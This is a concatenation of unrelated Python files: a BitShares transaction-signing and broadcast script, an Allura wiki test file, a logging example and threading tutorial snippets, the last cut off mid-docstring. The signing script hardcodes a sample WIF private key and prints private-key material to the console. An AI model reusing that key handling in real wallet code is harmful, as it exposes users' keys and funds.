    ref_block_num = block["head_block_number"] & 0xFFFF
    ref_block_prefix = unpack_from(
        "<I",
        unhexlify(block["head_block_id"]),
        4)[0]
    # fetch limit order create and cancel fee via websocket request
    fees = rpc_fees()
    # establish transaction expiration
    tx_expiration = to_iso_date(int(time() + 120))
    # initialize tx_operations list
    tx_operations = []
    ' SORT INCOMING EDICTS BY TYPE AND CONVERT TO DECIMAL '
    buy_edicts = []
    sell_edicts = []
    cancel_edicts = []
    # login requests carry no real edicts to sort
    if not login:
        for edict in order['edicts']:
            if edict['op'] == 'cancel':
                print(yellow(str({k: str(v) for k, v in edict.items()})))
                cancel_edicts.append(edict)
            elif edict['op'] == 'buy':
                print(yellow(str({k: str(v) for k, v in edict.items()})))
                buy_edicts.append(edict)
            elif edict['op'] == 'sell':
                print(yellow(str({k: str(v) for k, v in edict.items()})))
                sell_edicts.append(edict)
    # switch amounts and prices to decimal for precise scaling math
    for i in range(len(buy_edicts)):
        buy_edicts[i]['amount'] = decimal(buy_edicts[i]['amount'])
        buy_edicts[i]['price'] = decimal(buy_edicts[i]['price'])
    for i in range(len(sell_edicts)):
        sell_edicts[i]['amount'] = decimal(sell_edicts[i]['amount'])
        sell_edicts[i]['price'] = decimal(sell_edicts[i]['price'])
    if DEV:
        print('early edicts')
        edicts = cancel_edicts + buy_edicts + sell_edicts
        pprint(edicts)
    ' TRANSLATE CANCEL ORDERS TO GRAPHENE '
    for edict in cancel_edicts:
        if '1.7.X' in edict['ids']:  # the "cancel all" signal
            # for cancel all op, we collect all open orders in 1 market
            edict['ids'] = rpc_open_orders()
            print(yellow(str(edict)))
        for order_id in edict['ids']:
            # confirm it is good 1.7.x format:
            order_id = str(order_id)
            a, b, c = order_id.split('.', 2)
            assert (int(a) == 1)
            assert (int(b) == 7)
            assert (int(c) == float(c) > 0)
            # create cancel fee ordered dictionary
            fee = OrderedDict([
                ('amount', fees['cancel']),
                ('asset_id', '1.3.0')
            ])
            # create ordered operation dicitonary for this edict
            operation = [2,  # two means "Limit_order_cancel"
                         OrderedDict([
                             ('fee', fee),
                             ('fee_paying_account', account_id),
                             ('order', order_id),
                             ('extensions', [])
                         ])]
            # append the ordered dict to the tx operations list
            tx_operations.append(operation)
    if DEV:
        print('after cancel edicts')
        edicts = cancel_edicts + buy_edicts + sell_edicts
        pprint(edicts)
    ' SCALE ORDER SIZE TO FUNDS ON HAND '
    if (AUTOSCALE or BTS_FEES) and not login:
        currency, assets, bitshares = rpc_balances()
        if AUTOSCALE and len(buy_edicts + sell_edicts):
            # autoscale buy edicts
            if len(buy_edicts):
                currency_value = 0
                # calculate total value of each amount in the order
                for i in range(len(buy_edicts)):
                    currency_value += (buy_edicts[i]['amount'] *
                                       buy_edicts[i]['price'])
                # scale the order amounts to means
                scale = SIXSIG * currency / (currency_value + SATOSHI)
                if scale < 1:
                    print(
                        yellow(
                            'ALERT: scaling buy edicts to means: %.3f' %
                            scale))
                    for i in range(len(buy_edicts)):
                        buy_edicts[i]['amount'] *= scale
            # autoscale sell edicts
            if len(sell_edicts):
                asset_total = 0
                # calculate total amount in the order
                for i in range(len(sell_edicts)):
                    asset_total += (sell_edicts[i]['amount'])
                scale = SIXSIG * assets / (asset_total + SATOSHI)
                # scale the order amounts to means
                if scale < 1:
                    print(
                        yellow(
                            'ALERT: scaling sell edicts to means: %.3f' %
                            scale))
                    for i in range(len(sell_edicts)):
                        sell_edicts[i]['amount'] *= scale
        if DEV:
            print('after autoscale edicts')
            edicts = cancel_edicts + buy_edicts + sell_edicts
            pprint(edicts)
        ' ALWAYS SAVE LAST 2 BITSHARES FOR FEES '
        if BTS_FEES and (len(buy_edicts + sell_edicts)
                         and ('1.3.0' in [asset_id, currency_id])):
            # print(bitshares, 'BTS balance')
            # when BTS is the currency don't spend the last 2
            if currency_id == '1.3.0' and len(buy_edicts):
                bts_value = 0
                # calculate total bts value of each amount in the order
                for i in range(len(buy_edicts)):
                    bts_value += (buy_edicts[i]['amount'] *
                                  buy_edicts[i]['price'])
                # scale the order amounts to save last two bitshares
                scale = SIXSIG * \
                    max(0, (bitshares - 2)) / (bts_value + SATOSHI)
                if scale < 1:
                    print(
                        yellow(
                            'ALERT: scaling buy edicts for fees: %.4f' %
                            scale))
                    for i in range(len(buy_edicts)):
                        buy_edicts[i]['amount'] *= scale
            # when BTS is the asset don't sell the last 2
            if asset_id == '1.3.0' and len(sell_edicts):
                bts_total = 0
                # calculate total of each bts amount in the order
                for i in range(len(sell_edicts)):
                    bts_total += sell_edicts[i]['amount']
                scale = SIXSIG * \
                    max(0, (bitshares - 2)) / (bts_total + SATOSHI)
                # scale the order amounts to save last two bitshares
                if scale < 1:
                    print(
                        yellow(
                            'ALERT: scaling sell edicts for fees: %.4f' %
                            scale))
                    for i in range(len(sell_edicts)):
                        sell_edicts[i]['amount'] *= scale
        if DEV:
            print('after bts fee edicts')
            edicts = cancel_edicts + buy_edicts + sell_edicts
            pprint(edicts)
    # after scaling recombine buy and sell
    create_edicts = buy_edicts + sell_edicts
    ' REMOVE DUST EDICTS '
    if DUST and len(create_edicts):
        ce = []
        # dust threshold in human units for the traded asset
        dust = DUST * 100000 / 10 ** asset_precision
        for i in range(len(create_edicts)):
            if create_edicts[i]['amount'] > dust:
                ce.append(create_edicts[i])
            else:
                print(
                    red('WARN: removing dust threshold %s order' %
                        dust), create_edicts[i])
        create_edicts = ce[:]  # copy as new list
        del ce
    if DEV:
        print('after dust edicts')
        edicts = cancel_edicts + buy_edicts + sell_edicts
        pprint(edicts)
    ' TRANSLATE LIMIT ORDERS TO GRAPHENE '
    for i in range(len(create_edicts)):
        price = create_edicts[i]['price']
        amount = create_edicts[i]['amount']
        op_exp = int(create_edicts[i]['expiration'])
        # convert zero expiration flag to "really far in future"
        if op_exp == 0:
            op_exp = END_OF_TIME
        op_expiration = to_iso_date(op_exp)
        # we'll use ordered dicts and put items in api specific order
        min_to_receive = OrderedDict({})
        amount_to_sell = OrderedDict({})
        # derive min_to_receive & amount_to_sell from price & amount
        # means SELLING currency RECEIVING assets
        if create_edicts[i]['op'] == 'buy':
            min_to_receive['amount'] = int(amount *
                                           10 ** asset_precision)
            min_to_receive['asset_id'] = asset_id
            amount_to_sell['amount'] = int(amount * price *
                                           10 ** currency_precision)
            amount_to_sell['asset_id'] = currency_id
        # means SELLING assets RECEIVING currency
        if create_edicts[i]['op'] == 'sell':
            min_to_receive['amount'] = int(amount * price *
                                           10 ** currency_precision)
            min_to_receive['asset_id'] = currency_id
            amount_to_sell['amount'] = int(amount *
                                           10 ** asset_precision)
            amount_to_sell['asset_id'] = asset_id
        # Limit_order_create fee ordered dictionary
        fee = OrderedDict([
            ('amount', fees['create']),
            ('asset_id', '1.3.0')
        ])
        # create ordered dicitonary from each buy/sell operation
        operation = [1,
                     OrderedDict([
                         ('fee', fee),  # OrderedDict
                         ('seller', account_id),  # "a.b.c"
                         ('amount_to_sell', amount_to_sell),  # OrderedDict
                         ('min_to_receive', min_to_receive),  # OrderedDict
                         ('expiration', op_expiration),  # ISO8601
                         ('fill_or_kill', KILL_OR_FILL),  # bool
                         ('extensions', [])  # always empty list for our purpose
                     ])]
        tx_operations.append(operation)
    if login:
        # create an dummy cancel operation to pass to signing process
        fee = OrderedDict([
            ('amount', 0),
            ('asset_id', '1.3.0')
        ])
        operation = [2,
                     OrderedDict([
                         ('fee', fee),
                         ('fee_paying_account', account_id),
                         ('order', '1.7.0'),
                         ('extensions', [])
                     ])]
        tx_operations.append(operation)
    # prevent inadvertent huge number of orders
    tx_operations = tx_operations[:LIMIT]
    # the tx is just a regular dictionary we will convert to json later
    # the operations themselves must still be an OrderedDict
    tx = {'ref_block_num': ref_block_num,
          'ref_block_prefix': ref_block_prefix,
          'expiration': tx_expiration,
          'operations': tx_operations,
          'signatures': [],
          'extensions': []
          }
    return tx
def serialize_transaction(tx):
    """Serialize *tx* to graphene wire format and cross-check the manual
    byte string against the node's own serialization obtained over RPC.

    :param tx: transaction dict produced by build_transaction
    :return: (tx, message) where message is chain-id bytes + serialized tx,
        or (tx, b"") when there are no operations to broadcast
    :raises AssertionError: if the manual and RPC serializations differ
    """
    if tx['operations'] == []:
        return tx, b""
    # gist.github.com/xeroc/9bda11add796b603d83eb4b41d38532b
    print(blue('serialize_transaction'))
    print(yellow('IF WE DO EVERYTHING RIGHT:'))
    print(green('rpc_tx_hex = manual_tx_hex'))
    # RPC call for ordered dicts which are dumped by the query
    print(yellow('get RPC tx hex...'))
    rpc_tx_hex = rpc_get_transaction_hex_without_sig(tx)
    print(yellow('build manual tx hex...'))
    buf = b""  # create an empty byte string buffer
    # add block number, prefix, and tx expiration to the buffer
    buf += pack("<H", tx["ref_block_num"])  # 2 byte int
    buf += pack("<I", tx["ref_block_prefix"])  # 4 byte int
    buf += pack("<I", from_iso_date(tx['expiration']))  # 4 byte int
    # add length of operations list to buffer
    buf += bytes(varint(len(tx["operations"])))
    # add the operations list to the buffer in graphene type fashion
    for op in tx["operations"]:
        # print(op[0])  # Int (1=create, 2=cancel)
        # print(op[1])  # OrderedDict of operations
        buf += varint(op[0])
        if op[0] == 1:
            buf += bytes(Limit_order_create(op[1]))
        if op[0] == 2:
            buf += bytes(Limit_order_cancel(op[1]))
    # add length of (empty) extensions list to buffer
    buf += bytes(varint(len(tx["extensions"])))  # effectively varint(0)
    # this the final manual transaction hex, which should match rpc
    manual_tx_hex = hexlify(buf)
    print(red('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'))
    print(' rpc_tx_hex: ', rpc_tx_hex)
    print('manual_tx_hex: ', manual_tx_hex)
    print(red('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'))
    print(yellow('assert (rpc_tx_hex == manual_tx_hex)'))
    assert(rpc_tx_hex == manual_tx_hex), "Serialization Failed"
    print(green('Serialization Success'))
    # prepend the chain ID to the buffer to create final serialized msg
    message = unhexlify(ID) + buf
    return tx, message
def sign_transaction(tx, message):
    """ECDSA-sign *message* (chain id + serialized tx) with the global
    ``wif`` key and append the resulting compact signature to
    ``tx["signatures"]``.

    :param tx: transaction dict (mutated: one signature appended)
    :param message: bytes to sign, from serialize_transaction
    :return: tx with the new hex-encoded compact signature appended
    """
    # graphenebase/ecdsa.py
    # tools.ietf.org/html/rfc6979
    # @xeroc/steem-transaction-signing-in-a-nutshell
    # @dantheman/steem-and-bitshares-cryptographic-security-update
    # deterministic signatures retain the cryptographic
    # security features associated with digital signatures
    # but can be more easily implemented
    # since they do not need high-quality randomness
    # 1 in 4 signatures are randomly canonical; "normal form"
    # using the other three causes vulnerability to maleability attacks
    # as a metaphor; "require reduced fractions in simplest terms"
    def canonical(sig):
        # test whether the 64-byte signature is in graphene "normal form"
        sig = bytearray(sig)
        # 0x80 hex = 10000000 binary = 128 integer
        ret = (not (int(sig[0]) & 0x80) and
               not (sig[0] == 0 and not (int(sig[1]) & 0x80)) and
               not (int(sig[32]) & 0x80) and
               not (sig[32] == 0 and not (int(sig[33]) & 0x80)))
        print(green('canonical'), cyan(str(ret)))
        print(sig)
        return ret  # true/false
    # create fixed length representation of arbitrary length data
    # this will thoroughly obfuscate and compress the transaction
    # signing large data is computationally expensive and time consuming
    # the hash of the data is a relatively small
    # signing hash is more efficient than signing serialization
    digest = sha256(message).digest()
    print(digest)
    '''
    ECDSA
    eliptical curve digital signature algorithm
    this is where the real hocus pocus lies
    all of the ordering, typing, serializing, and digesting
    culminates with the message meeting the wif
    '''
    # 8 bit string representation of private key
    p = bytes(PrivateKey(wif))
    # create some arbitrary data used by the nonce generation
    ndata = secp256k1_ffi.new("const int *ndata")
    ndata[0] = 0  # it adds "\0x00", then "\0x00\0x00", etc..
    while True:  # repeat process until deterministic and cannonical
        ndata[0] += 1  # increment the arbitrary nonce
        # obtain compiled/binary private key from the wif
        privkey = secp256k1_PrivateKey(p, raw=True)
        print(red(str(privkey)))
        print(privkey)
        # create a new recoverable 65 byte ECDSA signature
        sig = secp256k1_ffi.new(
            'secp256k1_ecdsa_recoverable_signature *')
        # parse a compact ECDSA signature (64 bytes + recovery id)
        # returns: 1 = deterministic; 0 = not deterministic
        deterministic = (
            secp256k1_lib.secp256k1_ecdsa_sign_recoverable(
                privkey.ctx,  # initialized context object
                sig,  # array where signature is held
                digest,  # 32-byte message hash being signed
                privkey.private_key,  # 32-byte secret key
                secp256k1_ffi.NULL,  # default nonce function
                ndata  # incrementing nonce data
            ))
        if not deterministic:
            print('not deterministic, try again...')
            continue
        # we derive the recovery paramter
        # which simplifies the verification of the signature
        # it links the signature to a single unique public key
        # without this parameter, the back-end would need to test
        # for multiple public keys instead of just one
        signature, i = privkey.ecdsa_recoverable_serialize(sig)
        # we ensure that the signature is canonical; simplest form
        if canonical(signature):
            # add 4 and 27 to stay compatible with other protocols
            i += 4  # compressed
            i += 27  # compact
            # and have now obtained our signature
            break
    # having derived a valid canonical signature
    # we format it in its hexadecimal representation
    # and add it our transactions signatures
    # note that we do not only add the signature
    # but also the recover parameter
    # this kind of signature is then called "compact signature"
    signature = hexlify(
        pack("<B", i) + signature
    ).decode("ascii")
    tx["signatures"].append(signature)
    print(blue('tx["signatures"].append(signature)'))
    print(signature)
    print('')
    return tx
def verify_transaction(tx):
    # gist.github.com/xeroc/9bda11add796b603d83eb4b41d38532b
    """Re-derive the digest of *tx* and check its signatures against the
    public key belonging to the global ``wif``; returns tx unchanged."""
    print(blue('verify_transaction'))
    print(blue('tx2 = Signed_Transaction(**tx)'))
    rebuilt = Signed_Transaction(**tx)
    print(rebuilt)
    print(blue('tx2.deriveDigest("BTS")'))
    rebuilt.deriveDigest("BTS")
    print(blue('pubkeys = [PrivateKey(wif).pubkey]'))
    expected_keys = [PrivateKey(wif).pubkey]
    print(expected_keys)
    print(blue('tx2.verify(pubkeys, "BTS")'))
    rebuilt.verify(expected_keys, "BTS")
    return tx
' THE BROKER METHOD'
def broker(order):
    'broker(order) --> execute(signal, order)'
    # insistent timed multiprocess wrapper for authorized ops
    # covers all incoming buy/sell/cancel authenticated requests
    # if command does not execute in time: terminate and respawn
    # serves to force disconnect websockets if hung
    "up to ATTEMPTS chances; each PROCESS_TIMEOUT long: else abort"
    # signal is switched to 0 after execution to end the process
    # NOTE(review): the comment above says "to 0" but execute() sets
    # signal.value = 1 on completion — confirm intended polarity
    global_constants()
    global_variables()
    control_panel()
    # detect an authentication-only ("login") request
    log_in = False
    if order['edicts'][0]['op'] == 'login':
        log_in = True
    # shared memory flags: signal -> child finished, auth -> login succeeded
    signal = Value('i', 0)
    auth = Value('i', 0)
    i = 0
    # retry the child process until it signals completion or we run out
    while (i < ATTEMPTS) and not signal.value:
        i += 1
        print('')
        print('manualSIGNING authentication attempt:', i, ctime())
        child = Process(target=execute, args=(signal, log_in, auth, order))
        child.daemon = False
        child.start()
        if JOIN:  # means main script will not continue till child done
            child.join(PROCESS_TIMEOUT)
    # login requests report success/failure; trade requests return None
    if log_in:
        if auth.value == 1:
            return True
        else:
            return False
def execute(signal, log_in, auth, order):
    """Child-process entry point: build, serialize, sign, verify, and
    broadcast the transaction described by *order*.

    :param signal: multiprocessing.Value; set to 1 when finished
    :param log_in: bool; True for authentication-only requests
    :param auth: multiprocessing.Value; set to 1 on successful login
    :param order: validated order dict (edicts, nodes, header)
    :return: None
    """
    global nodes, account_id, account_name, wif, login, authenticated
    login = log_in
    start = time()
    if not DEV:  # disable printing with DEV=False
        blockPrint()
    nodes = order['nodes']
    account_id = order['header']['account_id']
    account_name = order['header']['account_name']
    wif = order['header']['wif']
    wss_handshake()
    if not DEV:
        enablePrint()
    # BUG FIX: if build_transaction() raised, `tx` was unbound and the
    # len(tx['operations']) test below crashed with NameError; fall back
    # to an empty operation list so the rejection branch runs instead
    tx = {'operations': []}
    try:
        tx = build_transaction(order)
    except Exception as e:
        trace(e)
    if len(tx['operations']):  # if there are any orders
        if not DEV:  # disable printing with DEV=False
            blockPrint()
        authenticated = False
        # BUG FIX: pre-bind `message` and `signed_tx` so a traced failure
        # in serialize/sign does not leave them unbound further down
        message = b""
        signed_tx = tx
        # perform ecdsa on serialized transaction
        try:
            tx, message = serialize_transaction(tx)
        except Exception as e:
            trace(e)
        try:
            signed_tx = sign_transaction(tx, message)
        except Exception as e:
            trace(e)
        if login:
            # PublicKey.__init__ switches "authenticated"
            if not DEV:
                enablePrint()
            print('authenticated', authenticated)
            if authenticated:
                auth.value = 1
        else:
            signed_tx = verify_transaction(signed_tx)
            if not DEV:
                enablePrint()
            broadcasted_tx = rpc_broadcast_transaction(signed_tx)
    else:
        print(red('manualSIGNING rejected your order'), order['edicts'])
    print('manualSIGNING process elapsed: %.3f sec' %
          (time() - start))
    print('')
    # tell the parent loop in broker() we are done
    signal.value = 1
    return None
def prototype_order():
    # creates an auto formatted empty prototype order in json format
    # you will add your ['edicts'] and ['wif']
    # metaNODE handles everything else
    """Return a json skeleton order; caller fills in 'edicts' and 'wif'.

    usage:
        from manualSIGNING import prototype_order
        order = json_loads(prototype_order())
        order['header']['wif'] = wif
        order['edicts'] = edicts
        broker(order)
    """
    metaNODE = Bitshares_Trustless_Client()
    # assemble the header from the metaNODE market description
    header = {
        'asset_id': metaNODE['asset_id'],
        'currency_id': metaNODE['currency_id'],
        'asset_precision': metaNODE['asset_precision'],
        'currency_precision': metaNODE['currency_precision'],
        'account_id': metaNODE['account_id'],
        'account_name': metaNODE['account_name'],
    }
    proto = {'op': '', 'nodes': metaNODE['whitelist'], 'header': header}
    del metaNODE
    return json_dumps(proto)
' IN SCRIPT DEMONSTRATION '
def log_in():
    """Interactive demo setup: print the banner, prompt for account name
    and wif (with mock fallbacks), stamp the credentials into the sample
    orders, and let the user pick buy / cancel / authenticate.

    Mutates the listed globals; returns None.
    """
    global wif, account_name, account_id
    global order, order1, order2, order3, nodes
    print("\033c")  # clear terminal
    # bitshares ascii logo encoded and compressed
    b = b'x\x9c\xad\xd4M\n\xc4 \x0c\x05\xe0}O1P\x12B\x10\xbc\x82\xf7?\xd5\xf8\xaf\x83F\xe3\xe0[t\xf9\xf5%\xda>\x9f\x1c\xf7\x7f\x9e\xb9\x01\x17\x0cc\xec\x05\xe3@Y\x18\xc6(\'Z\x1a\xca.\x1bC\xa5l\r\x85\xa20\xb6\x8a\xca\xd8,W0\xec\x05\xc3\xdf\xd4_\xe3\r\x11(q\x16\xec\x95l\x04\x06\x0f\x0c\xc3\xddD\x9dq\xd2#\xa4NT\x0c/\x10\xd1{b\xd4\x89\x92\x91\x84\x11\xd9\x9d-\x87.\xe4\x1cB\x15|\xe0\xc8\x88\x13\xa5\xbc\xd4\xa21\x8e"\x18\xdc\xd2\x0e\xd3\xb6\xa0\xc6h\xa3\xd4\xde\xd0\x19\x9a\x1e\xd8\xddr\x0e\xcf\xf8n\xe0Y\rq\x1fP:p\x92\xf2\xdbaB,v\xda\x84j\xc4.\x03\xb1>\x97\xee{\x99oSa\x00\x0f\xc6\x84\xd8\xdf\x0f\xb4e\xa7$\xfdE\xae\xde\xb1/\x1d\xfc\x96\x8a'
    print(cyan(decompress(b).decode()))
    print(green(' y**2 = x**3 + 7'))
    print('************************************************************')
    print('')
    print(green(' manualSIGNING - BUY/SELL/CANCEL OPS v%.8f alpha' % VERSION))
    print('')
    print('************************************************************')
    print('')
    print(' given a buy/sell/cancel order and wif:')
    print(' convert to graphene terms')
    print(' serialize the transaction')
    print(' perform ECDSA')
    print(' broadcast to a public node')
    print(' use only standard python modules')
    print(' spell the rest out here concisely')
    print('')
    print(' if you input name and wif this script will:')
    print('')
    print(red(' BUY 10 BTS with OPEN.BTC at 0.00000100'))
    print('')
    print(green(" WITHOUT IMPORTING PYBITSHARES "))
    print('')
    print('enter account name (press ENTER for demo)')
    print('')
    account_name = input('account name: ')
    print('')
    print('lookup account_id...')
    print('')
    # empty input falls back to a mock demo account
    if account_name == '':
        account_name = 'fd'  # some random acct
        print('using mock account for demo: %s' % account_name)
    nodes = order1['nodes']
    # create a websocket connection
    wss_handshake()
    # convert account name to id via rpc request
    account_id = rpc_account_id()
    print(account_id)
    print('')
    # input wallet import format key for authentication
    wif = getpass(prompt='enter wif (press ENTER for demo): ')
    if not wif:
        # some random wif
        wif = "5JLw5dgQAx6rhZEgNN5C2ds1V47RweGshynFSWFbaMohsYsBvE8"
        print('using sample wallet import format (wif)')
        print(wif)
    print('')
    print(green('BEGIN DEMO'))
    print('')
    # add wif, account_id, and account_name to sample order headers
    order1['header']['wif'] = wif
    order1['header']['account_id'] = account_id
    order1['header']['account_name'] = account_name
    order2['header']['wif'] = wif
    order2['header']['account_id'] = account_id
    order2['header']['account_name'] = account_name
    order3['header']['wif'] = wif
    order3['header']['account_id'] = account_id
    order3['header']['account_name'] = account_name
    print(' 1:buy, 2:cancel, 3:authenticate ')
    # loop until the user picks a valid menu option
    select = 0
    while select not in [1, 2, 3]:
        select = int(input('1, 2, or 3? '))
    if select == 1:
        order = order1
    if select == 2:
        order = order2
    if select == 3:
        order = order3
def demo():
    # this is the backbone of events for the demo
    """Run the full signing pipeline on the globally selected order:

    receive order
    build graphene transaction
    serialize transaction
    sign transaction
    verify transaction
    broadcast transaction

    Each stage is individually wrapped so a traced failure still shows
    how far the pipeline got before stopping.
    """
    try:
        print(purple('======================================'))
        print(purple('receive order                         '))
        print(purple('======================================'))
        pprint(order)
        print('')
    except Exception as e:
        trace(e)
    try:
        print(purple('======================================'))
        print(purple('build graphene transaction from order '))
        print(purple('======================================'))
        tx = build_transaction(order)
        pprint(tx)
        print('')
    except Exception as e:
        trace(e)
    if len(tx['operations']):
        try:
            print(purple('======================================'))
            print(purple('serialize transaction bytes string    '))
            print(purple('======================================'))
            tx, message = serialize_transaction(tx)
            pprint(tx)
            print('')
        except Exception as e:
            trace(e)
        try:
            print(purple('======================================'))
            print(purple('sign transaction with wif             '))
            print(purple('======================================'))
            signed_tx = sign_transaction(tx, message)
            pprint(signed_tx)
            print('')
        except Exception as e:
            trace(e)
        try:
            print(purple('======================================'))
            print(purple('verify the signature on transaction   '))
            print(purple('======================================'))
            signed_tx = verify_transaction(signed_tx)
            pprint(signed_tx)
            print('')
        except Exception as e:
            trace(e)
        try:
            print(purple('======================================'))
            print(purple('broadcast transaction                 '))
            print(purple('======================================'))
            broadcasted_tx = rpc_broadcast_transaction(signed_tx)
            pprint(broadcasted_tx)
            print('')
        except Exception as e:
            trace(e)
    else:
        print('no operations to broadcast')
    # best-effort close of the global websocket connection
    try:
        ws.close()
        print(purple('connection terminated'))
    except Exception as e:
        trace(e)
    print('')
    print('END')
def main():
    """Demo entry point: initialize sample orders, constants, globals and
    the control panel, then prompt the user and run the signing demo."""
    sample_orders()
    global_constants()
    global_variables()
    control_panel()
    log_in()
    demo()
# run the interactive demo only when executed as a script
if __name__ == "__main__":
    main()
|
test_models.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from pylons import tmpl_context as c
from ming.orm import session
from allura.tests import TestController
from allura.tests import decorators as td
from alluratest.controller import setup_global_objects
from allura import model as M
from allura.lib import helpers as h
from forgewiki.model import Page
class TestPageSnapshots(TestController):

    @td.with_wiki
    def test_version_race(self):
        # threads must not throw DuplicateKeyError
        # details https://sourceforge.net/p/allura/tickets/7647/
        import time
        import random
        from threading import Thread, Lock

        page = Page.upsert('test-page')
        page.commit()

        commit_lock = Lock()

        def worker(n):
            setup_global_objects()
            for i in range(10):
                p = Page.query.get(title='test-page')
                p.text = 'Test Page %s.%s' % (n, i)
                time.sleep(random.random())
                # tests use mim (mongo-in-memory), which isn't thread-safe
                with commit_lock:
                    p.commit()

        threads = [Thread(target=lambda: worker(1)),
                   Thread(target=lambda: worker(2))]
        for t in threads:
            t.start()
        for t in threads:
            t.join()

        page = Page.query.get(title='test-page')
        # 10 changes by each thread + initial upsert
        assert page.history().count() == 21, page.history().count()
class TestPage(TestController):

    @td.with_wiki
    def test_authors(self):
        # authors() lists distinct committers and drops disabled users
        user = M.User.by_username('test-user')
        admin = M.User.by_username('test-admin')

        with h.push_config(c, user=admin):
            page = Page.upsert('test-admin')
            page.text = 'admin'
            page.commit()
        with h.push_config(c, user=user):
            page.text = 'user'
            page.commit()

        authors = page.authors()
        assert len(authors) == 2
        assert user in authors and admin in authors

        # disabling a user must remove them from the author list
        user.disabled = True
        session(user).flush(user)

        authors = page.authors()
        assert len(authors) == 1
        assert user not in authors and admin in authors
|
sshlogger.py | '''
Created on Sep 24, 2017
@author: arnon
'''
from acrilog import SSHLogger
import multiprocessing as mp
import logging
def log(logger_info):
    """Emit sample records through two named child loggers built from the
    server's *logger_info* handle (runs in a spawned worker process)."""
    warn_logger = SSHLogger.get_logger(logger_info, name='example.e1')
    info_logger = SSHLogger.get_logger(logger_info, name='example.e2')
    info_logger.info('How quickly daft jumping zebras vex.')
    warn_logger.warning('Jail zesty vixen who grabbed pay from quack.')
    warn_logger.debug('Quick zephyrs blow, vexing daft Jim.')
    info_logger.error('The five boxing wizards jump quickly.')
def main():
    """Start an SSHLogger server, log from this process and from a
    spawned child process, then shut the server down."""
    log_server = SSHLogger('example', logging_level=logging.DEBUG, console=True, consolidate=True)
    log_server.start()
    logger_info = log_server.logger_info()

    parent_logger = SSHLogger.get_logger(logger_info=logger_info)
    parent_logger.info('Jackdaws love my big sphinx of quartz.')

    worker = mp.Process(target=log, args=(logger_info,))
    worker.start()
    worker.join()

    log_server.stop()
if __name__ == '__main__':
    # required when frozen into an executable; harmless otherwise
    mp.freeze_support()
    # 'spawn' start method keeps child processes free of inherited state
    mp.set_start_method('spawn')
    main()
|
Logger.py | # -*- coding: utf-8 -*-
"""
Created on Mon Dec 26 15:56:10 2016
@author: Dell
"""
from time import ctime
import threading
def info(log: str, target='console'):
    """
    log: text to record.
    target: 'console' to print log on screen or file to write in.
    """
    if target == 'console':
        # print from a short-lived thread (kept for interface parity);
        # `daemon = True` replaces the deprecated setDaemon()
        thd = threading.Thread(target=print, args=(ctime(), ':', log))
        thd.daemon = True
        thd.start()
        thd.join()
    else:
        # BUG FIX: this branch previously duplicated the console branch
        # and never touched *target* despite the documented contract;
        # append the timestamped line to the file instead
        try:
            with open(target, 'a') as f:
                f.write('%s : %s\n' % (ctime(), log))
        except Exception as e:
            print(e)
def write_file(text, target):
    """Write *text* to the file *target*; errors are printed, not raised."""
    # BUG FIX: the file was opened in the default read mode ('r'), so
    # f.write() always failed; and when open() itself failed, `f` was
    # unbound and the finally-clause close raised NameError.
    # `with open(..., 'w')` fixes both and guarantees the close.
    try:
        with open(target, 'w') as f:
            f.write(text)
    except Exception as e:
        print(e)
func.py | # import threading as tr
# # from time import sleep, time
# import time
# def foo(num):
# print(tr.current_thread())
# sleep(2)
# print(num)
# start = time()
# print(tr.current_thread())
# thr1 = tr.Thread(target=foo, args=(1, ))
# thr2 = tr.Thread(target=foo, args=(2, ))
# thr1.start()
# thr2.start()
# thr1.join()
# thr2.join()
# print(f'Done in: {time()-start}')
#-----------------------------------
# def foo(num):
# print(tr.current_thread())
# sleep(num)
# start = time()
# threads = []
# for i in range(10):
# thr1 = tr.Thread(target=foo, args=(1, ))
# thr1.start()
# threads.append(thr1)
# while threads:
# print(threads, len(threads))
# sleep(0.5)
# for index, th in enumerate(threads):
# if not th.is_alive():
# threads.pop(index)
# print('Done')
# #---------------------------------
# import os
# import requests
# import time
# import threading as th
# def save_image():
# url = 'https://loremflickr.com/320/240/dog'
# response = requests.get(url)
# name = response.url.split('/')[-1]
# path = os.path.join(os.getcwd(), 'images', name)
# with open(path, 'wb') as file:
# file.write(response.content)
# start = time.time()
# threads = []
# for _ in range(100):
# t = th.Thread(target=save_image)
# t.start()
# threads.append(t)
# for th in threads:
# th.join()
# print(time.time() - start)
# #---------------------------------
# Многопоточность в многопроцессинг
# import os
# import requests
# from multiprocessing.pool import ThreadPool
# def save_image(*args):
# url = 'https://loremflickr.com/320/240/dog'
# response = requests.get(url)
# name = response.url.split('/')[-1]
# path = os.path.join(os.getcwd(), 'images', name)
# with open(path, 'wb') as file:
# file.write(response.content)
# start = time.time()
# with ThreadPool(25) as pool:
# pool.map(save_image, range(100))
# print(time.time() - start)
# #===============================
# import time
# import threading as tr
# count = 500_000_000
# def countdown(n):
# while n > 0:
# n-=1
# start = time.time()
# countdown(count)
# print(time.time() - start)
# #===============================
# import time
# import threading as tr
# count = 500_000_000
# def countdown(n):
# while n > 0:
# n-=1
# start = time.time()
# t1 = tr.Thread(target=countdown, args=(count//2, ))
# t2 = tr.Thread(target=countdown, args=(count//2, ))
# t1.start()
# t2.start()
# t1.join()
# t2.join()
# print(time.time() - start)
# #===============================
# import time
# import threading as tr
# import multiprocessing as mpr
# cpu_count = mpr.cpu_count()*2
# print(cpu_count)
# count = 500_000_000
# def countdown(n):
# while n > 0:
# n-=1
# start = time.time()
# p1 = mpr.Process(target=countdown, args=(count//2, ))
# p2 = mpr.Process(target=countdown, args=(count//2, ))
# p1.start()
# p2.start()
# p1.join()
# p2.join()
# print(time.time() - start)
#===============================
import time
import threading as tr
import multiprocessing as mpr

# Spawn twice as many workers as reported cores; the extra processes keep
# every core busy even while some workers are being scheduled.
cpu_count = mpr.cpu_count() * 2

# Total amount of pure-CPU busy work to split across the workers.
count = 500_000_000


def countdown(n):
    """Busy-loop *n* down to zero.

